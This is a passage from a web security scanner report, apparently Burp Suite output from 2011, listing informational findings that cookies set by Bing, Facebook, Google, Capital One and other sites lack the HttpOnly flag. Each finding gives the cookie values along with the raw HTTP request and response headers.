OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:52 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:52 GMT
Connection: close
Set-Cookie: _SS=SID=27FE84C2DCDE46E1930C9C9FE31D1EA9; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:52 GMT; domain=.bing.com; path=/

Ref A: 856ADD0ECD934AEAAB8686D00359423E Ref B: CFF6F7BD182B7180D1F1A7EEDD75B386 Ref C: Wed Feb 02 07:43:52 2011
PST

12.500. http://www.bing.com/travel/hotels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/hotels

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=5FF4597C29944F46AD1E896475146096; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:53 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:53 GMT
Connection: close
Set-Cookie: _SS=SID=5FF4597C29944F46AD1E896475146096; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:53 GMT; domain=.bing.com; path=/

Ref A: D21EFBC22FA94566A9345B8A941F116A Ref B: 5EF405CAC3BECA319DBF4BD733C05E5F Ref C: Wed Feb 02 07:43:53 2011
PST

12.501. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=1D8B0FDCCFE14AAF8C689C75E8B4E4C4; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce76641ff25774cb1b1d83ab67d8126d3; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.502. http://www.bing.com/videos/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Thu, 31-Jan-2013 15:38:48 GMT; domain=.bing.com; path=/videos
_HOP=I=1&TS=1296574728; domain=.bing.com; path=/
_SS=SID=7F4016131B0E4D14A29A3BCD60BA716F; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:48 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.503. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/earthquake-proof-bridge/pfu8x7j

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42006; domain=.bing.com; path=/videos
ocid=42006; domain=.bing.com; path=/videos
_SS=SID=6E5A086A9AF74D6F91B72385C55EFF40; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c167cdd32c1d54aa292824403b8d50b5f; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:20 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.504. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42007; domain=.bing.com; path=/videos
ocid=42007; domain=.bing.com; path=/videos
_SS=SID=7C5FE46609BE4E3A9076C3F8E41856C4; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cdd20830f9ef94917afbd4f441898d81d; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.505. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/jay-mohr-part-1/17wj9ueo7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42008; domain=.bing.com; path=/videos
ocid=42008; domain=.bing.com; path=/videos
_SS=SID=D2547B15F9A24BA98E03DAB3C7FFE7C8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c37fc55856c584608a47042f42a9be2a2; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.506. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=5A86ECC36E34429890A9098D97A000AD; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0b86cfda968c42abbd8910da2588a90e; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.507. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=D1AB7D58E73848B48ED1B91EE1D196FE; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c4b33e784809849ac99aa3617334dea9b; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.508. http://www.capitalone.com/creditcards/orbitz/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/creditcards/orbitz/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=CB900D89605E0146; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 15:44:26 GMT; path=/; domain=.capitalone.com
external_id=WWW_ZZORBZ_BNUSCD_QS_FB_11_ZZ_ZZ_PARTNER%5C%5C; path=/; domain=.capitalone.com
caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=795419914.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.509. http://www.cheaptickets.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheaptickets.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=41A0C8377E063EDF9406ACA3829AA4EF; Path=/
anon=6141560721296661466911; Domain=.cheaptickets.com; Expires=Tue, 28-Jan-2031 15:44:26 GMT; Path=/
OrbitzRegistration="N,0,0,0"; Domain=.cheaptickets.com; Expires=Tue, 28-Jan-2031 15:44:26 GMT; Path=/
BetaGroup="02/02/2011 09:44:26|A|A|N|C|N|H|B|P|N"; Domain=.cheaptickets.com; Expires=Wed, 16-Feb-2011 15:44:26 GMT; Path=/
logging=41A0C8377E063EDF9406ACA3829AA4EF|egapp12p|; Domain=.cheaptickets.com; Path=/
NSC_JOgil22jbs5zdatbqdhwzldyh4ibbdt=ffffffff09e3a73b45525d5f4f58455e445a4a4217b9;path=/
NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3087845525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cheaptickets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.510. http://www.demandstudios.com/ehow-writers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.demandstudios.com
Path:	/ehow-writers.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BIGipServerdemandstudios.com-69.64.153.116-80=622659338.20480.0000; path=/ ; domain=demandstudios.com; path=/
DemandStudiosContributorApplication=utm_source=EHOWcom&utm_medium=banner&utm_campaign=ehow&url_referrer=&migration_group=; expires=Fri, 04-Mar-2011 15:44:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ehow-writers.html?utm_source=EHOWcom&utm_medium=banner&utm_campaign=ehow HTTP/1.1
Host: www.demandstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.511. http://www.digitalia.be/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digitalia.be
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

60gp=R4049230386; path=/; expires=Sat, 05-Feb-2011 16:07:51 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.512. http://www.ehow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

google-autocomplete=autocomplete; domain=.ehow.com; expires=Wed, 09-Feb-2011 15:11:14 GMT; path=/
oml=direct; path=/
oms=homepage; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.513. http://www.evow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.evow.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ft=Monday, January 31, 2011 5:34:04 PM; expires=Sat, 19-Jun-2038 00:34:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.evow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.514. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=J5foX; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=J5foX; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 21:51:01 GMT
Content-Length: 30789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.515. http://www.facebook.com/btaylor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/btaylor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbtaylor; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.516. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

12.517. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.518. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.519. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

12.520. http://www.facebook.com/ligatt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ligatt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fligatt; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ligatt HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

12.521. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.522. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

12.523. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.524. http://www.google.com/setprefs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/setprefs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1296661892:GM=1:SG=2:S=R2c15B476pm3H2IR; expires=Fri, 01-Feb-2013 15:51:32 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.525. https://www.google.com/accounts/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GALX=aNg8LjEjNB8;Path=/accounts;Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/Login?hl=en&continue=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Set-Cookie: GALX=aNg8LjEjNB8;Path=/accounts;Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dmillenium%252Bboston
Date: Wed, 02 Feb 2011 15:57:45 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11615
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

12.526. http://www.lodging.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lodging.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V_UID=108c31a8b837dc2a9f172ab4478a7f54; expires=Tue, 24-Jan-2012 15:44:45 GMT; path=/
V_T=19ad24574735baeae7b3a96b3fa7ec3d; expires=Wed, 02-Feb-2011 16:14:45 GMT; path=/
V_CHNL=KGRpcmVjdCk%3D; expires=Sat, 30-Jan-2021 15:44:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.lodging.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.527. http://www.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

expac=828II6a37_1229:C~126II4a36_0830:WP10_4|; domain=www.msn.com; expires=Sat, 05-Feb-2011 16:03:22 GMT; path=/
expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=msn.com; expires=Wed, 16-Feb-2011 16:03:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.528. http://www.omniture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_omniture=84542986.5892.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 14:30:28 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

12.529. http://www.omniture.com/de previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/de

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:52:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.530. http://www.omniture.com/en previous next

Summary

Severity:	Information
Confidence:	Certain
